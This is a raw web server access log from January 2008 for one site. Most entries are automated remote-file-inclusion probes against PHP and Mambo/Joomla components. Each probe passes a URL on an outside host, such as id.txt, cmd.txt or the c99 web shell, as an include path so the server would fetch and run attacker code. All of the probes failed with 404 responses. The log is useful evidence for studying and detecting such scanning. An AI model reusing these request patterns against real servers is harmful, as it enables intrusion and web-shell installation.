208.226.79.133 - - [30/Jan/2008:08:09:39 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:08:09:41 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:08:10:17 -0800] "GET /logs/access_071229.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.16.251.245 - - [30/Jan/2008:08:10:17 -0800] "GET /logs/access_071229.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.200.228.2 - - [30/Jan/2008:08:10:20 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://photographersusa.com/catimages/.../.../ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.247.133.76 - - [30/Jan/2008:08:11:18 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.133.76 - - [30/Jan/2008:08:11:18 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:08:12:16 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:08:12:16 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:08:12:28 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.199.108 - - [30/Jan/2008:08:13:03 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.108 - - [30/Jan/2008:08:13:03 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.108 - - [30/Jan/2008:08:13:04 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.211.2 - - [30/Jan/2008:08:13:14 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://gcd.jveuger.nl/site/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.21.63.146 - - [30/Jan/2008:08:13:31 -0800] "GET /logs//config.inc.php?path_escape=http://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:08:14:24 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:08:14:42 -0800] "GET /logs/access_080106.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:08:14:43 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:08:14:44 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.216.205.192 - - [30/Jan/2008:08:15:53 -0800] "GET /logs/access.log/config.php?path_to_root=http://pucorp.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [30/Jan/2008:08:15:53 -0800] "GET /config.php?path_to_root=http://pucorp.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [30/Jan/2008:08:15:53 -0800] "GET /logs/config.php?path_to_root=http://pucorp.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.208.192.59 - - [30/Jan/2008:08:16:01 -0800] "GET /index.php?pagina1=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.205.192 - - [30/Jan/2008:08:17:42 -0800] "GET /logs/access_071228.log/config.php?path_to_root=http://pucorp.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.34.68.128 - - [30/Jan/2008:08:18:45 -0800] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.ceia.uchile.cl/cache/mic2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
193.34.68.128 - - [30/Jan/2008:08:18:45 -0800] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.ceia.uchile.cl/cache/mic2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
65.55.209.207 - - [30/Jan/2008:08:19:05 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [30/Jan/2008:08:19:05 -0800] "GET /_private/ HTTP/1.0" 403 163 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
210.118.170.134 - - [30/Jan/2008:08:19:24 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.151.162.98 - - [30/Jan/2008:08:19:39 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [30/Jan/2008:08:19:39 -0800] "GET /logs//login.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.89.97 - - [30/Jan/2008:08:19:46 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/jembutc/hajar.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.108 - - [30/Jan/2008:08:19:46 -0800] "GET /plans/A3_ROOF_PLAN.pdf HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.89.97 - - [30/Jan/2008:08:19:46 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/jembutc/hajar.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.77.182.148 - - [30/Jan/2008:08:20:01 -0800] "GET /!scanhttp://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
222.77.182.148 - - [30/Jan/2008:08:20:01 -0800] "GET /logs/!scanhttp://bxsafe.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
67.212.164.34 - - [30/Jan/2008:08:20:16 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.gvnr.xpg.com.br/id.txt?t? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [30/Jan/2008:08:20:17 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.gvnr.xpg.com.br/id.txt?t? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [30/Jan/2008:08:20:17 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.gvnr.xpg.com.br/id.txt?t? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.80.93.168 - - [30/Jan/2008:08:20:30 -0800] "GET /logs/access_071230.log//vwar/convert/mvcw.php?step=1&vwar_root=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [30/Jan/2008:08:20:31 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [30/Jan/2008:08:20:31 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.88.11.140 - - [30/Jan/2008:08:21:08 -0800] "GET /logs//templates/Official/part_userprofile.php?template_path=http://www.publichost.de/support/attachments/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
85.88.11.140 - - [30/Jan/2008:08:21:08 -0800] "GET //templates/Official/part_userprofile.php?template_path=http://www.publichost.de/support/attachments/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:08:21:11 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:08:21:12 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:08:21:13 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:08:21:14 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:08:21:15 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:08:21:15 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.164.178 - - [30/Jan/2008:08:22:44 -0800] "GET //hysteresis//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.30.136 - - [30/Jan/2008:08:22:44 -0800] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fileden.com/files/2008/1/21/1711593/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.30.136 - - [30/Jan/2008:08:22:45 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fileden.com/files/2008/1/21/1711593/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.30.136 - - [30/Jan/2008:08:22:45 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fileden.com/files/2008/1/21/1711593/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.90 - - [30/Jan/2008:08:23:20 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sarion.info/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [30/Jan/2008:08:23:20 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sarion.info/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [30/Jan/2008:08:23:21 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sarion.info/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.120.47 - - [30/Jan/2008:08:23:39 -0800] "GET /logs/access_071230.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.lchs83.org/images/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.120.47 - - [30/Jan/2008:08:23:39 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.lchs83.org/images/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.120.47 - - [30/Jan/2008:08:23:40 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.lchs83.org/images/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [30/Jan/2008:08:24:35 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://semprenovidades.pagebr.com/overnkn/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [30/Jan/2008:08:24:36 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://semprenovidades.pagebr.com/overnkn/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [30/Jan/2008:08:24:36 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://semprenovidades.pagebr.com/overnkn/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:08:24:51 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:08:24:51 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:08:24:51 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:08:24:56 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.63.234 - - [30/Jan/2008:08:25:58 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.63.234 - - [30/Jan/2008:08:25:58 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.151.162.98 - - [30/Jan/2008:08:26:16 -0800] "GET /logs/access_071228.log//login.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.126.175.146 - - [30/Jan/2008:08:27:20 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.126.175.146 - - [30/Jan/2008:08:27:21 -0800] "GET /index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.126.175.146 - - [30/Jan/2008:08:27:21 -0800] "GET /logs/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.11.140 - - [30/Jan/2008:08:27:22 -0800] "GET /logs//templates/Official/part_userprofile.php?template_path=http://www.publichost.de/support/attachments/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
85.88.11.140 - - [30/Jan/2008:08:27:23 -0800] "GET //templates/Official/part_userprofile.php?template_path=http://www.publichost.de/support/attachments/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:08:29:14 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:08:29:15 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [30/Jan/2008:08:29:15 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.249.0.39 - - [30/Jan/2008:08:29:32 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://semprenovidades.pagebr.com/overnkn/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [30/Jan/2008:08:29:32 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://semprenovidades.pagebr.com/overnkn/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [30/Jan/2008:08:29:33 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://semprenovidades.pagebr.com/overnkn/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.241.12 - - [30/Jan/2008:08:30:09 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
193.254.241.12 - - [30/Jan/2008:08:30:09 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
74.6.22.221 - - [30/Jan/2008:08:30:11 -0800] "GET /tools/ HTTP/1.0" 200 12388 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.3.86.86 - - [30/Jan/2008:08:30:34 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://fantastiki.net/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.58.105.162 - - [30/Jan/2008:08:31:13 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.58.105.162 - - [30/Jan/2008:08:31:14 -0800] "GET /index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.58.105.162 - - [30/Jan/2008:08:31:14 -0800] "GET /logs/index.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
116.193.163.10 - - [30/Jan/2008:08:31:56 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://real-spam.com/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:08:32:12 -0800] "GET /logs/access_080112.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:08:32:13 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:08:32:14 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.234.234 - - [30/Jan/2008:08:32:30 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [30/Jan/2008:08:34:21 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://www.gvnr.xpg.com.br/id.txt?t? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [30/Jan/2008:08:34:48 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.pcr.ac.id/~rina/includes/file/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.47.202.20 - - [30/Jan/2008:08:34:55 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
72.47.202.20 - - [30/Jan/2008:08:34:55 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.3.139.86 - - [30/Jan/2008:08:35:16 -0800] "GET /logs/access_071229.log/index1.php?table=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.86 - - [30/Jan/2008:08:35:16 -0800] "GET /index1.php?table=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.86 - - [30/Jan/2008:08:35:17 -0800] "GET /logs/index1.php?table=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.173.187.166 - - [30/Jan/2008:08:35:34 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://www.google.com/search?hl=en&q=presto+studios" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
74.200.211.2 - - [30/Jan/2008:08:37:04 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://gcd.jveuger.nl/site/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.211.2 - - [30/Jan/2008:08:37:04 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://gcd.jveuger.nl/site/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:08:39:54 -0800] "GET /logs/access_080101.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.215 - - [30/Jan/2008:08:39:58 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.3.139.86 - - [30/Jan/2008:08:40:32 -0800] "GET /logs/access_071229.log/index2.php?table=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.86 - - [30/Jan/2008:08:40:32 -0800] "GET /index2.php?table=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.86 - - [30/Jan/2008:08:40:32 -0800] "GET /logs/index2.php?table=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.191.30.136 - - [30/Jan/2008:08:41:03 -0800] "GET /logs/access_071202.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fileden.com/files/2008/1/21/1711593/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:08:41:17 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:08:41:19 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:08:41:20 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:08:41:28 -0800] "GET /logs/access_071229.log/include.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.13.54.2 - - [30/Jan/2008:08:41:28 -0800] "GET /include.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
